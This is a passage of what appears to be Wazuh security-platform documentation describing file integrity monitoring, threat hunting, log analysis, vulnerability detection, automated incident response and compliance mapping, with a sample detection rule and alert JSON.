You can find a dedicated File Integrity Monitoring module in the Wazuh dashboard where all file integrity events triggered from monitored endpoints are reported. This increases visibility as it provides valuable information on the status of monitored directories and their potential impact on the security posture. The Wazuh FIM dashboard has three different sections to view FIM analysis results; Inventory, Dashboard, and Events.

  1. The Inventory section displays a list of all files that the FIM module has indexed. Each file has entry information including the filename, last modification date, user, user ID, group, and file size.

    File Integrity Monitoring module inventory
  2. The Dashboard section shows an overview of the events triggered by the FIM module for all monitored endpoints. You can also streamline it to show the events for a selected monitored endpoint.

    File Integrity Monitoring dashboard
  3. The Events section shows the alerts triggered by the FIM module. It displays details such as the agent name, the file path of the monitored file, the type of FIM event, a description of the alert, and the rule level of each alert.

    File Integrity Monitoring module alerts

Below are common use cases the Wazuh FIM module would assist you in monitoring within your environment.

Monitoring file integrity

Modifications to configuration files and file attributes are frequent occurrences within endpoints in an IT infrastructure. However, if not validated, there may be unauthorized and inadvertent changes that could affect the behavior of the endpoints or the applications running in them. The Wazuh FIM module runs periodic scans on specific files and directories to detect file changes in real time. It scans the designated files to create a baseline of the current state. It checks for file modifications by comparing checksums and attribute values to the baseline, generating alerts if discrepancies are found.

The Wazuh FIM module supports various configuration options that enable effective monitoring of assets:

  • Real-time monitoring: The FIM module provides a realtime attribute that enables continuous monitoring of specified directories. This feature is particularly useful for monitoring critical directories and tracking changes immediately after they occur. Wazuh allows you to specify the directories or files in the monitored endpoints that would be reported in real-time if file changes occur.

  • Scheduled monitoring: The frequency option in the Wazuh FIM module allows users to customize the scheduling of each FIM scan performed in your monitored endpoints. The default scan interval for the FIM module is 12 hours (43200 seconds) and can be customized on each endpoint. Alternatively, scans can be scheduled using the scan_time and the scan_day options. These options help users to set up FIM scans outside business hours or during holidays.

  • Who-data monitoring: Wazuh captures advanced insights into file changes using the who-data functionality. This functionality uses audit tools like the Linux Audit subsystem and Microsoft Windows SACL to determine important information about the detected file changes. The who-data monitoring functionality allows the FIM module to obtain information on when the change event occurred, who or what made the change, and what content was changed. This is useful in maintaining accountability and validating if changes made to monitored files or directories were authorized and performed using approved processes.

    Below is an example of an alert generated when a monitored file is changed on a Windows endpoint.

    File Integrity Monitoring modified file alert

    In alert fields, the who-data metadata shows that the user wazuh added the word Hello to the audit_docu.txt file using the Notepad.exe process.

    FIM modified file alert details
  • Reporting changes in file values: The FIM module provides a report_changes attribute that records and reports the exact content changed in a text file to the Wazuh server. The attribute enables the Wazuh agent to make copies of monitored files to a private location on each endpoint for further review. This monitoring option is helpful when users want to initiate specific responses when file changes in monitored directories match the behavior of known malicious activities. For example, the alert below indicates when Wazuh detects the creation of a web shell scripting file webshell-script.php in a monitored directory.

    Web shell scripting file creation alert
  • Recording file attributes: Users can configure the FIM module to record specific attributes of a monitored file. Wazuh supports various file attributes that users can use to specify the file metadata that the FIM module will record or ignore. For example, this monitoring option would be useful when users want to record only the SHA-256 hash of a configuration file, excluding other hash types.

Detecting and responding to malware

The Wazuh FIM module integrates with other Wazuh capabilities and third-party threat intelligence solutions to create a comprehensive security monitoring environment. This is imperative to enhance malware detection and response capabilities, ensuring robust defense against cyber threats.

The Wazuh FIM module supports various integrations, including but not limited to:

  • File integrity monitoring and YARA: By combining the Wazuh FIM module and the YARA tool, it is possible to detect malware when suspicious file additions or modifications are identified. The YARA rule files contain samples of malware indicators that are downloaded to the monitored endpoints. When the FIM module detects a change in the monitored file or directory, it executes a YARA scan using a script to determine if it is malware. If the YARA rule finds a match with a file, it will send the scan results to the Wazuh server for decoding and alerting. This would be reported according to the custom rule and decoder configurations configured on the Wazuh server. Check this documentation for more information on how to integrate the Wazuh FIM module with YARA.

  • File integrity monitoring and VirusTotal: The Wazuh Integrator module connects to external APIs and alerting tools such as VirusTotal. The VirusTotal integration uses the VirusTotal API to detect malicious file hashes within the files and directories monitored by the FIM module. Once enabled, when FIM generates alerts, Wazuh initiates the VirusTotal integration to extract the hash value associated with the flagged file from the alert. The VirusTotal API is then used to compare these hashes against its scanning engines for potentially malicious content.

  • File integrity monitoring and Active Response: The Wazuh Active Response module automatically responds to threats identified in a timely manner. This combination enables the FIM module to not only detect but also respond to malicious activities. You can configure active response scripts to execute when the FIM module detects file changes in your monitored environment. Additionally, it also generates alerts for the response performed. This reduces the Mean Time To Respond (MTTR) as malicious changes detected are remediated in a timely manner.

    In the image below Wazuh triggers when a file is added to the monitored endpoint. The VirusTotal API scans the file and identifies it as malicious content on 55 engines. Then the Wazuh Active Response module acts immediately to remove the threat from the monitored endpoint.

    FIM and Active Response using VirusTotal alerts
  • File integrity monitoring and CDB list: Wazuh FIM module also detects malicious files by checking the presence of known malware signatures when combined with CDB lists (constant database). CDB lists are used to store known malware indicators of Compromise (IOCs) such as file hashes, IP addresses, and domain names. When CDB lists are created, Wazuh checks if field values from FIM alerts such as file hash match the keys stored in the CDB lists. If matched, it generates an alert and response based on how you configure your custom rule.

    File with known malware hash detected and removed alerts
Monitoring Windows Registry

The Wazuh FIM module periodically scans Windows Registry entries, stores its checksums and attributes in a local database, and alerts when changes in registry values are detected. This would keep users informed about registry modifications resulting from user activities or software installations whether malicious or not.

You can configure the Wazuh open source FIM module to monitor Windows Registry values using various configuration options. The report_changes attribute in the windows_registry option provides a granular breakdown of modification detected in the monitored Windows Registry value. You can configure which Windows Registry attributes the module would record or ignore. For example, you can choose to record the check_sha1sum attribute and ignore the check_md5sum attribute, if your CDB list only contains SHA1 hashes of malicious files.

The image below shows the event of a modified Windows registry value in a monitored endpoint.

FIM modified registry key alert

The alert when expanded shows the modified field.

FIM modified registry key alert details

Threat actors maintain persistence by commonly adding programs for their malicious activities to the Run and RunOnce keys in the Registry. Additionally, Wazuh detects any suspicious programs added to the startup registry keys. This allows you to take appropriate action to remove them before they cause harm to your system.

FIM registry value added alert
Meeting regulatory compliance

Meeting regulatory compliance requirements is an important consideration for organizations in various industries. File integrity monitoring is a requirement for achieving compliance with regulations such as PCI DSS, SOX, HIPAA, NIST SP 800-53, among others.

You can customize the Wazuh FIM module to monitor specific files and directories where your organization’s sensitive and confidential data are stored. Wazuh provides a comprehensive report that outlines the changes made to the files and directories being monitored. This feature is particularly useful for ensuring compliance with various regulatory standards.

For example, organizations can meet the CM-3 Configuration change control requirement in NIST SP 800-53 standard by using Wazuh. The control requires organizations to protect information at rest and monitor configuration changes in their infrastructure. The image below shows an event generated when the permissions for Uncomplicated Firewall (UFW) rule files are modified on a monitored endpoint.

UFW user rules file modification alert
Threat hunting

Threat hunting is a proactive approach that involves analyzing numerous data sources like logs, network traffic, and endpoint data to identify and eliminate cyber threats that have evaded traditional security measures. It aims to uncover potential threats that may have gone undetected in an IT environment. The process of threat hunting typically involves several steps: hypothesis generation, data collection, analysis, and response.

Wazuh offers several capabilities that assist security teams in hunting threats within their environment, empowering them to take rapid actions to contain the threat and prevent further damage.

Log data analysis

Effective log data collection and analysis are essential for enhancing your threat hunting methodology. You can leverage the robust capabilities of Wazuh to optimize your threat hunting efforts.

Wazuh as a unified XDR and SIEM platform offers centralized log data collection, allowing gathering of data from diverse sources such as endpoints, network devices, and applications. This centralized approach simplifies analysis and reduces the effort required to monitor multiple sources.

The image below shows the configuration settings on the Wazuh dashboard for collecting audit logs from a monitored endpoint.

Log collection settings

Wazuh uses decoders to extract meaningful information from log data obtained from various sources. It breaks down raw log data into individual fields or attributes, such as timestamp, source IP address, destination IP address, event type, and others. The Index patterns tab on the Wazuh dashboard shows the wazuh-alerts-* index pattern and its fields.

wazuh-alerts-* index pattern

Wazuh offers agentless monitoring and syslog log collection for efficient log data handling. It ensures consistency and compatibility across various log formats. Wazuh indexing and querying capabilities facilitate quick search and access to specific log data, streamlining analysis and investigation. Wazuh uses its advanced parsing and real-time analysis to enhance threat hunting by proactively identifying and mitigating risks thereby enhancing security.

Wazuh archives

Wazuh provides a centralized storage location for archiving all collected logs from monitored endpoints. The Wazuh archives logs include those that do not trigger alerts on the Wazuh dashboard. Wazuh archives are disabled by default and can be easily enabled. The availability of detailed logs is crucial for effective threat hunting, providing comprehensive visibility into your environment.

Wazuh archives provide log retention, indexing, and querying capabilities that give concrete visibility to analyze events within specific monitored endpoints in your environment. This facilitates uncovering event causes, event locations, event communications, event timestamps, and related parent-child processes. The image below shows the archived logs in the Discover section on the Wazuh dashboard.

wazuh-archives in the Discover section
MITRE ATT&CK mapping

The MITRE ATT&CK framework offers a standardized approach to mapping and understanding cyber attack tactics, techniques, and procedures (TTPs). By utilizing the Wazuh MITRE ATT&CK module, we can enhance our understanding of TTPs used by threat actors and proactively defend against them.

The Wazuh MITRE ATT&CK module maps TTPs to generated events, facilitating efficient threat hunting by promptly identifying patterns in attacker behavior. For instance, a suspicious login attempt can be associated with the “Credential Stuffing” technique in the MITRE ATT&CK framework. This empowers users to assess the frequency of such attacks and implement necessary measures to mitigate risks, such as enabling multi-factor authentication or rate-limiting login attempts. The MITRE ATT&CK module on the Wazuh dashboard allows you to view various techniques found within a monitored environment.

The MITRE ATT&CK module

This module generates reports and visualizations on the Wazuh dashboard, showcasing the frequency and severity of attacks utilizing specific TTP. These reports help track compliance with security standards and regulations while highlighting areas where security measures may require strengthening. The Wazuh MITRE ATT&CK module on the Wazuh dashboard has a customizable dashboard that displays an overview of TTPs found within a monitored environment as seen below.

The MITRE ATT&CK module dashboard

You can proactively protect your systems and data by leveraging insights from the MITRE ATT&CK framework. The integration of MITRE ATT&CK with Wazuh significantly enhances threat hunting and improves overall security.

Third-party integration

Wazuh integrates with third-party solutions that enhance threat hunting capabilities. These integrations enable users to consolidate data from diverse sources and automate threat detection and response. Wazuh seamlessly integrates with popular open source platforms like VirusTotal, AlienVault, URLHaus, MISP, and many others. This integration allows users to cross-reference telemetry with threat intelligence feeds, improving detection and response to threats.

Third-party integrations play a crucial role in proactive threat hunting, encompassing threat intelligence and a range of collaborative tools. These integrations provide essential insights into both established and emerging threats, enabling a comprehensive and forward-looking approach to threat detection. By promoting the exchange of information among seasoned security teams, these integrations foster a collective defense strategy, enhancing the effectiveness of the overall threat hunting process.

Some third-party solutions that Wazuh integrates with to aid threat hunting are:

  • VirusTotal: Integrating VirusTotal enhances threat detection by leveraging the VirusTotal malware database for accurate identification and faster incident response. The image below shows malware detection via the VirusTotal integration.

    Malware detection via the VirusTotal integration
  • URLHaus: Integrating URLHaus by abuse.ch with Wazuh amplifies threat intelligence capabilities, empowering users to proactively detect and block malicious URLs in real-time.

  • MISP: We can enrich Wazuh alerts by automating identifications of IOCs and integrating MISP with Wazuh.

Wazuh integrates with other tools that aid threat hunting beyond the above-mentioned. It supports third-party integrations for threat intelligence platforms, SIEMs, and messaging platforms using APIs and other integration methods.

Rules and decoders

Wazuh enhances threat hunting with robust rules, decoders, and pre-configured rules for diverse attack vectors and cyber activities.

The Rules module on the Wazuh dashboard presents both default and custom rules, covering a broad array of security events, including system anomalies, malware detection, authentication failures, and other potential threats as seen below.

Wazuh dashboard rules view

Wazuh allows you to customize and create your own rules and decoders, tailored to your specific environment and threat landscape. This enables you to fine-tune detection, address unique requirements, and minimize blind spots.

Wazuh decoders play a vital role in normalizing and parsing diverse log formats and data sources. They ensure that collected information is presented in a standardized manner, facilitating effective analysis and correlation of data from various sources.

The Decoders module on the Wazuh dashboard allows you to view default and custom decoders. The image below shows details of the default decoder agent-upgrade.

Details of the default agent-upgrade decoder

Leveraging Wazuh rules and decoders, security teams attain actionable insights, enabling them to swiftly detect IOCs, anomalous behavior, and potential breaches.

Refer to the Wazuh ruleset documentation for detailed guidance on configuring custom rules and decoders.

Log data analysis

Log data analysis is a crucial process that involves examining and extracting valuable insights from log files created by different systems, applications, or devices. These logs contain records of events that provide useful information for troubleshooting, security analysis and monitoring, and optimizing performance. Log data analysis is an essential practice that contributes to a secure, efficient, and reliable IT ecosystem.

Wazuh collects, analyzes, and stores logs from endpoints, network devices, and applications. The Wazuh agent, running on a monitored endpoint collects and forwards system and application logs to the Wazuh server for analysis. Additionally, you can send log messages to the Wazuh server via syslog or third-party API integrations.

Log data collection

Wazuh collects logs from a wide range of sources, enabling comprehensive monitoring of various aspects of your IT environment. You can check our documentation on Log data collection to understand better how Wazuh collects and analyzes logs from monitored endpoints. Some of the common log sources supported by Wazuh include:

  • Operating system logs: Wazuh collects logs from several operating systems, including Linux, Windows, and macOS.

    Wazuh can collect syslog, auditd, application logs, and others from Linux endpoints.

    Wazuh collects logs on Windows endpoints using the Windows event channel and Windows event log format. By default, the Wazuh agent monitors the System, Application, and Security Windows event channels on Windows endpoints. The Wazuh agent offers the flexibility to configure and monitor other Windows event channels.

    Wazuh utilizes the unified logging system (ULS) to collect logs on macOS endpoints. The macOS ULS centralizes the management and storage of logs across all the system levels.

    The image below shows an event collected from the Microsoft-Windows-Sysmon/Operational event channel on a Windows endpoint.

    Sysmon operational Event channel alert
  • Syslog events: Wazuh gathers logs from syslog-enabled devices, encompassing a wide array of sources including Linux/Unix systems and network devices that do not support agent installation. The image below shows an alert triggered when a new user is created on the Linux endpoint and the log is forwarded to the Wazuh server via rsyslog.

    New user added to the system alert
  • Agentless monitoring: The Wazuh agentless monitoring module monitors endpoints that don't support agent installation. It requires an SSH connection between the endpoint and the Wazuh server. The Wazuh agentless monitoring module monitors files, directories, or configurations and runs commands on the endpoint. The image below is an alert from an agentless device on the Wazuh dashboard.

    Agentless device alert
  • Cloud provider logs: Wazuh integrates with cloud providers like AWS, Azure, Google Cloud, and Office 365 to collect logs from cloud services such as EC2 instances, S3 buckets, Azure VMs, and more. The image below shows the CLOUD SECURITY section in the Wazuh dashboard.

    Cloud provider modules
  • Custom logs: You can configure Wazuh to collect and parse logs from several applications and third-party security tools like VirusTotal, Windows Defender, and ClamAV. The image below shows an alert of a log from VirusTotal processed by the Wazuh server.

    VirusTotal log alert
Rules and decoders

Wazuh rules and decoders are core components in log data analysis and threat detection and response. Wazuh provides a powerful platform for log data analysis, allowing organizations to enhance their security posture by promptly detecting and responding to potential security threats.

Wazuh decoders are responsible for parsing and normalizing log data collected from various sources. Decoders are essential for converting the raw log data in several formats into a unified and structured format that Wazuh can process effectively. Wazuh has pre-built decoders for common log formats such as syslog, Windows event channel, macOS ULS, and more. Additionally, Wazuh allows you to define custom decoders for parsing logs from specific applications or devices with unique log formats. By using decoders, Wazuh can efficiently interpret log data and extract relevant information, such as timestamps, log levels, source IP addresses, user names, and more. As shown below, you can view Wazuh out-of-the-box and custom decoders on the Server management > Decoders of the Wazuh dashboard.

Decoders in Wazuh dashboard

Wazuh ruleset detects security events and anomalies in log data. These rules are written in a specific format and they trigger alerts when certain conditions are met. The rules are defined based on certain criteria like log fields, values, or patterns to match specific log entries that may indicate security threats. Wazuh provides a wide range of pre-built rules covering common security use cases. Additionally, administrators can create custom rules tailored to their specific environment and security requirements. The Server management category of the Wazuh dashboard lets you view the default and custom Rules.

Rules in Wazuh dashboard

For example, the rule below includes a match field used to define the pattern that the rule looks for. The rule also has a level field that specifies the priority of the resulting alert. Additionally, rules enrich events with technique identifiers from the MITRE ATT&CK framework and map them to regulatory compliance controls.

<rule id="5715" level="3">
  <if_sid>5700</if_sid>
  <match>^Accepted|authenticated.$</match>
  <description>sshd: authentication success.</description>
  <mitre>
    <id>T1078</id>
    <id>T1021</id>
  </mitre>
  <group>authentication_success,gdpr_IV_32.2,gpg13_7.1,gpg13_7.2,hipaa_164.312.b,nist_800_53_AU.14,nist_800_53_AC.7,pci_dss_10.2.5,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3,</group>
</rule>
Log data indexing and storage

The Wazuh indexer is a highly scalable, distributed real-time search and analytics engine. The Wazuh indexer is critical in log analysis as it stores and indexes alerts generated by the Wazuh server. These alerts are stored as JSON documents.

The Wazuh indexer guarantees redundancy by storing the JSON documents across several containers called shards and distributing the shards across multiple nodes. This implementation prevents downtime when hardware failures or cyber-attacks occur and increases query capacity as nodes are added to a cluster.

Wazuh uses four indices to store several event types:

  • wazuh-alerts stores alerts generated by the Wazuh server when an event triggers a rule with high enough priority. The image below shows alerts in the Discover module of the Wazuh dashboard. The index pattern is set to wazuh-alerts-* by default.

    Alerts in the wazuh-alerts-* index pattern
  • wazuh-archives index stores all events received from the Wazuh server regardless of whether they trigger an alert. The Wazuh archives use this index to enable log retention and querying capabilities that offer deeper insight into events happening within monitored endpoints. Wazuh archives are disabled by default because of the huge storage requirements needed to store all the logs. The image below shows archived events in the Discover section of Wazuh dashboard with the index pattern set to wazuh-archives-*.

    Events in wazuh-archives-* index pattern
  • wazuh-monitoring index stores data about the state of Wazuh agents over a period of time. The state of the agent could be Active, Disconnected, or Never connected. This information is very useful in tracking Wazuh agents that are not reporting for several reasons that need investigation. The image below shows the connection status of the agents on the Wazuh dashboard. The agent information as shown in the image is collected from the wazuh-monitoring index.

    Agent information from wazuh-monitoring index
  • wazuh-statistics index stores performance data related to the Wazuh server. This information is critical to ensuring the Wazuh server performs optimally with the available computing resources. The image below shows performance-related events on the Wazuh dashboard.

    Performance-related events
Log data querying and visualization

The Wazuh dashboard offers log data querying and visualization capabilities. You can leverage the dashboard’s intuitive interface to conduct complex searches and queries to extract meaningful insights from the log data collected by Wazuh.

Wazuh provides a set of predefined dashboards and visualizations out of the box, specifically tailored to security monitoring and compliance use cases. These dashboards provide insight into common security events such as failed logins, malware detection, and system anomalies. You can further customize these dashboards to suit your specific needs and requirements. Below is a sample image of the Security event dashboard showing several interesting information like Top 5 PCI DSS Requirements, Top 5 alerts, and Alert groups evolution.

Security event dashboard

The Wazuh dashboard enables users to explore log entries in real time, apply various filters, and drill down into specific events or time ranges. This flexibility allows security analysts to identify trends, anomalies, and potential security incidents within their environment.

Wazuh allows users to create customized dashboards that display key performance indicators, security metrics, and real-time monitoring of critical systems and applications. Users can assemble multiple visualizations, such as pie charts, line graphs, and heat maps, onto a single dashboard, providing a holistic view of their infrastructure's security posture. The following blog posts detailed how to query and create custom dashboards:

Vulnerability detection

Software vulnerabilities are weaknesses in code that can allow attackers to gain access to or manipulate the behavior of an application. Vulnerable software applications are commonly targeted by attackers to compromise endpoints and gain a persistent presence on targeted networks.

Vulnerability detection is the process of identifying these flaws before they are discovered and exploited by attackers. The goal of vulnerability detection is to identify vulnerabilities so that remediation can be carried out to prevent successful attacks.

The Wazuh agent uses the Syscollector module to collect inventory details from the monitored endpoint. It sends the collected data to the Wazuh server. Within the Wazuh server, the Vulnerability Detection module correlates the software inventory data with vulnerability content documents to detect vulnerable software on the monitored endpoint.

Wazuh detects vulnerable applications, generating risk reports, using our Cyber Threat Intelligence (CTI) platform. In this platform, we aggregate vulnerability data from diverse sources like operating system vendors and vulnerability databases, consolidating it into a unified, reliable repository. The process involves standardizing the varied formats into a common structure. Additionally, we maintain the integrity of our vulnerability data by doing the following.

  • Rectifying format inconsistencies like version errors and typos.

  • Completing missing information.

  • Incorporating new cybersecurity vulnerabilities.

Subsequently, we merge this content, uploading the compiled documents to a cloud server. Finally, we publish these documents to our CTI API.

Relying on the Wazuh CTI, the Vulnerability Detection module supports a variety of operating systems, such as Windows, CentOS, Red Hat Enterprise Linux, Ubuntu, Debian, Amazon Linux, Arch Linux, and macOS operating systems, and applications.

Achieve comprehensive visibility

The Vulnerability Detection module generates alerts for vulnerabilities discovered on the operating system and applications installed on the monitored endpoint. It correlates the software inventory collected by the Wazuh agent with the vulnerability content documents and displays the alert generated on the Wazuh dashboard. This provides a clear and comprehensive view of vulnerabilities identified in all monitored endpoints, allowing you to view, analyze and fix vulnerabilities.

The vulnerability detection dashboard shows the frequency of occurrences in different categories such as package name, operating system, agent name, vulnerability ID, and alert severity. This allows analysts to direct their focus appropriately.

Vulnerabilities inventory

You can view the alerts generated on the dashboard when new vulnerabilities are discovered.

Vulnerability alerts

The alerts generated on the dashboard could also be a result of remediation activities. The image below shows alerts generated after an upgrade or an uninstallation of a package resolved a vulnerability.

Resolved vulnerability alerts
Obtain actionable intelligence from vulnerability alerts

Wazuh vulnerability alerts contain relevant information about the identified vulnerability which can help users understand and decide on remediation steps. You can see an example of a vulnerability detection alert below:

Vulnerability alert example
{
 "_index": "wazuh-alerts-4.x-sample-threat-detection",
 "_id": "e2ffSY8Be9PWdpLhA_nt",
 "_version": 1,
 "_score": null,
 "_source": {
   "predecoder": {},
   "cluster": {
     "name": "wazuh"
   },
   "agent": {
     "ip": "197.17.1.4",
     "name": "Centos",
     "id": "005"
   },
   "manager": {
     "name": "wazuh-server"
   },
   "data": {
     "vulnerability": {
       "severity": "Medium",
       "package": {
         "condition": "Package less or equal than 2.1.7.3-2",
         "name": "cryptsetup",
         "version": "2:1.6.6-5ubuntu2.1",
         "architecture": "amd64"
       },
       "references": [
         "http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html",
         "http://www.openwall.com/lists/oss-security/2016/11/14/13",
         "http://www.openwall.com/lists/oss-security/2016/11/15/1",
         "http://www.openwall.com/lists/oss-security/2016/11/15/4",
         "http://www.openwall.com/lists/oss-security/2016/11/16/6",
         "http://www.securityfocus.com/bid/94315",
         "https://gitlab.com/cryptsetup/cryptsetup/commit/ef8a7d82d8d3716ae9b58179590f7908981fa0cb",
         "https://nvd.nist.gov/vuln/detail/CVE-2016-4484",
         "http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4484.html",
         "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4484"
       ],
       "cve_version": "4.0",
       "assigner": "cve@mitre.org",
       "published": "2017-01-23",
       "cwe_reference": "CWE-287",
       "title": "CVE-2016-4484 on Ubuntu 16.04 LTS (xenial) - low.",
       "rationale": "The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.",
       "cve": "CVE-2016-4484",
       "state": "Fixed",
       "bugzilla_references": [
         "https://launchpad.net/bugs/1660701"
       ],
       "cvss": {
         "cvss2": {
           "base_score": "7.200000",
           "vector": {
             "integrity_impact": "complete",
             "confidentiality_impact": "complete",
             "availability": "complete",
             "attack_vector": "local",
             "access_complexity": "low",
             "authentication": "none"
           }
         },
         "cvss3": {
           "base_score": "6.800000",
           "vector": {
             "user_interaction": "none",
             "integrity_impact": "high",
             "scope": "unchanged",
             "confidentiality_impact": "high",
             "availability": "high",
             "attack_vector": "physical",
             "access_complexity": "low",
             "privileges_required": "none"
           }
         }
       },
       "updated": "2017-01-26"
     }
   },
   "@sampledata": true,
   "rule": {
     "firedtimes": 290,
     "mail": false,
     "level": 7,
     "pci_dss": [
       "11.2.1",
       "11.2.3"
     ],
     "tsc": [
       "CC7.1",
       "CC7.2"
     ],
     "description": "CVE-2016-4484 affects cryptsetup",
     "groups": [
       "vulnerability-detector"
     ],
     "id": "23504",
     "gdpr": [
       "IV_35.7.d"
     ]
   },
   "location": "vulnerability-detector",
   "id": "1580123327.49031",
   "decoder": {
     "name": "json"
   },
   "timestamp": "2024-05-05T17:44:08.518+0000"
 },
 "fields": {
   "data.vulnerability.published": [
     "2017-01-23T00:00:00.000Z"
   ],
   "data.vulnerability.updated": [
     "2017-01-26T00:00:00.000Z"
   ],
   "timestamp": [
     "2024-05-05T17:44:08.518Z"
   ]
 },
 "highlight": {
   "manager.name": [
     "@opensearch-dashboards-highlighted-field@wazuh-server@/opensearch-dashboards-highlighted-field@"
   ],
   "rule.groups": [
     "@opensearch-dashboards-highlighted-field@vulnerability-detector@/opensearch-dashboards-highlighted-field@"
   ]
 },
 "sort": [
   1714931048518
 ]
}

As you can see above, the alert contains key information about the detected vulnerability. This information includes the CVE information, reference links for further research, and a description that provides a concise explanation of the vulnerability.

Track vulnerability remediation

The Wazuh Vulnerability Detection module also allows you to confirm when a vulnerability has been remediated. This feature detects when a patch or software upgrade resolves a previously detected vulnerability. The feature is enabled using the hotfixes option and is available for Windows endpoints.

Windows vulnerability resolved alert
Use vulnerability reports to identify critical security issues

Wazuh provides users with the ability to download a report that contains security events related to discovered and resolved vulnerabilities. This feature allows users to identify endpoints with unresolved vulnerabilities and keep track of remediation activities.

Vulnerability Detection report generation
Incident response

A security incident refers to any adverse event or activity that risks or threatens the confidentiality, integrity, or availability of digital assets, networks, data, or resources. Such incidents include unauthorized access, data breaches, malware infections, denial-of-service attacks, and any other activities that compromise the security posture of an organization's information technology environment.

The goal of incident response is to effectively handle a security incident and restore normal business operations as quickly as possible. As organizations’ digital assets continuously grow, managing incidents manually becomes increasingly challenging, hence the need for automation.

Automated incident response involves automatic actions taken when responding to security incidents. These actions can include isolating compromised endpoints, blocking malicious IP addresses, quarantining infected devices, or disabling compromised user accounts. By automating incident response, cybersecurity teams reduce response time to detected threats, prevent or minimize the impact of incidents, and efficiently handle a large volume of security events.

Wazuh Active Response module

The Wazuh Active Response module allows users to run automated actions when incidents are detected on endpoints. This improves an organization's incident response processes, enabling security teams to take immediate and automated actions to counter detected threats.

You can also configure the actions to be either stateless or stateful. Stateless active responses are one-time actions while stateful responses revert their actions after some time.

Default active response actions

Out-of-the-box scripts are available on every operating system that runs the Wazuh agents. Some of the default active response scripts include:

Name of script

Description

disable-account

Disables a user account

firewall-drop

Adds an IP address to the iptables deny list.

firewalld-drop

Adds an IP address to the firewalld drop list.

restart.sh

Restarts the Wazuh agent or server.

netsh.exe

Blocks an IP address using netsh.

Custom active response actions

One of the benefits of the Wazuh Active Response module is its adaptability. Wazuh allows security teams to create custom active response actions in any programming language, tailoring them to their specific needs. This ensures that when a threat is detected, the response can be customized to align with the organization's requirements.

Automating incident response with Wazuh

To leverage the Wazuh Active Response module, you need to configure the action to be carried out when a specific event occurs on a monitored endpoint. For example, you can configure the Wazuh Active Response module to delete a malicious executable from an infected endpoint. In the examples that follow, we show how the Wazuh Active Response module handles different incidents.

Removing malware

You can use the Wazuh Active Response module in conjunction with the File Integrity Monitoring module and VirusTotal integration to detect and remove malicious files from an endpoint.

The image below shows the following activities:

  1. Rule ID 554 is fired when a file is added to the Downloads directory which is monitored with the Wazuh File Integrity Monitoring module.

  2. Rule ID 87105 triggers when Wazuh extracts the file hash, requests data about the file hash from the VirusTotal database via its API, and receives a malicious file response.

  3. Rule ID 553 is fired when a file is deleted from the Downloads directory which is monitored with the Wazuh File Integrity Monitoring module.

  4. Rule ID 110006 is fired when the Wazuh Active Response module deletes the malicious file from the endpoint.

Removing malware activity events

In this scenario, the Wazuh Active Response module automatically removes the malicious file, reducing the time between threat detection and mitigation.

Responding to DoS attacks

The primary goal of a DoS attack is to render the target inaccessible to legitimate users, causing a denial of service. In the image below, we show how the Wazuh Active Response module blocks malicious IP addresses performing a DoS against a web server on an Ubuntu endpoint.

Host blocked by Active Response alerts

In this case, the Wazuh Active Response module automatically blocks the malicious hosts from causing a DoS attack on the web server. Thereby ensuring the availability of the web server to the authorized users.

Disabling a user account after a brute-force attack

Account lockout is a security measure used to defend against brute force attacks by limiting the number of login attempts a user can make within a specified time. We use the Wazuh Active Response module to disable the user account whose password is being guessed by an attacker.

In the image below, the Wazuh Active Response module disables the account on a Linux endpoint and re-enables it again after 5 minutes.

Linux account temporarily disabled alerts

In this scenario, when an attacker tries to guess a user's password repeatedly and fails, the account becomes temporarily inaccessible. This impedes attackers who rely on brute-force methods to guess user account passwords.

By utilizing the Wazuh Active Response module, security teams can automate responses to different incidents. Thereby ensuring efficient incident response and a more resilient cybersecurity posture.

Regulatory compliance

Regulatory compliance means following laws, rules, regulations, and standards set by government bodies, industry regulators, or other authorities. Organizations need to adhere to regulatory compliance to uphold the integrity of business operations and protect sensitive data.

Adhering to regulatory requirements constitutes a crucial component within an organization's cybersecurity framework. Through alignment with relevant laws, rules, and benchmarks, entities can safeguard their information resources and mitigate the likelihood of security breaches.

Wazuh provides several capabilities for implementing compliance, including:

  • File Integrity Monitoring (FIM).

  • Security Configuration Assessment (SCA).

  • Vulnerability detection.

  • Malware detection.

  • Incidence response.

Wazuh provides out-of-the-box rulesets mapped against compliance tags for PCI DSS, HIPAA, NIST 800-53, TSC, and GDPR frameworks and standards.

Regulatory compliance modules

Wazuh allows you to create custom rules and tag them to compliance standards that suit your needs. The following section details use cases for the supported standards.

PCI DSS

PCI DSS (Payment Card Industry Data Security Standard) outlines the security criteria that businesses that process, store, and transmit card data must adhere to. This standard is designed to tighten security measures surrounding cardholder data and lessen fraud within the payment card industry.

Payment card industries can leverage Wazuh capabilities to reinforce PCI DSS adherence. Users can customize these capabilities to align with specific business needs as stipulated by the standard. For example, you can use Wazuh to conduct a PAN scan by creating customs rules that detect the presence of an unmasked Primary Account Number(PAN).

Alert of unmasked Primary Account Number (PAN)

You can find more information on how Wazuh helps organizations meet the PCI DSS standard.

GDPR

The General Data Protection Regulation (GDPR), developed by the European Union, aims to harmonize data privacy laws throughout the continent. The protection of the data of citizens of the European Union is its main priority. The GDPR framework intends to enhance user data privacy and change how the European Union, and organizations that process EU citizens data handle data privacy.

GDPR module dashboard

Wazuh comes with default rules and decoders to identify different kinds of cyberattacks, misconfigured systems, security vulnerabilities, and policy violations. These events are tagged to the relevant GDPR requirements. You can find more information on how Wazuh helps organizations meet the GDPR regulatory compliance.

HIPAA

The Health Insurance Portability and Accountability Act is a legal framework that enables healthcare institutions and organizations to prevent the unauthorized disclosure of sensitive patient health information. The Health Insurance Portability and Accountability Act (HIPAA) sets guidelines and procedures for processing health information to increase the efficiency of healthcare services. It entails guidelines for electronic healthcare transactions and standards for security and distinctive health identification.

The HIPAA framework requires federal privacy protections for health information due to technological advancements, which have an influence on the privacy and security of this information.

Organizations can monitor access and changes made to PII (personally identifiable information) and other confidential documents using the Wazuh FIM module.

You can find more information on how Wazuh helps organizations meet the HIPAA framework.

The image below shows the creation and deletion of a file on a monitored endpoint.

FIM alert of file created and deleted
NIST 800-53

